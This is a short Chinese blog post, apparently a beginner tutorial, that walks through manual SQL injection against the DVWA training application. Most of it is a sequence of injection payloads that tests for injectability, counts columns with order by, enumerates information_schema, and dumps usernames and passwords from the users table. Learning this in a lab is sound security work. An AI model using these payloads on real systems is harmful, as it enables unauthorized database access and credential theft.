SQL手动注入初级基本思路

周泽翔

已于 2023-09-09 22:12:33 修改

阅读量67

点赞数

文章标签：网络 web安全

于 2023-09-09 14:07:45 首次发布

本文链接：https://blog.csdn.net/weixin_49050715/article/details/132776673

版权

可以手动添加 and 1 = 1  或者 and 1 = 2判断
一般如果添加and 1 = 1 ，页面访问的页面不变
和 如果添加and 1= 2，页面访问错误。就可以确认当前页面可以SQL注入

添加1' and 1 = 1

在这里插入图片描述
说明是单引号闭合

1’ order by 2#

在这里插入图片描述
其中#代表注释掉后面的 ‘ ，以确保SQL语句的正常执行

1' union select 1,2#

在这里插入图片描述

1' union select 1,database()#

在这里插入图片描述

1’ union select 1,table_name from information_schema.tables where table_schema = 'dvwa
在这里插入图片描述

1' union select 1,group_concat(column_name) from 	information_schema.columns where table_name = 'users

在这里插入图片描述

1' union select group_concat(user_id,first_name,last_name),group_concat(user,password) from users#

关注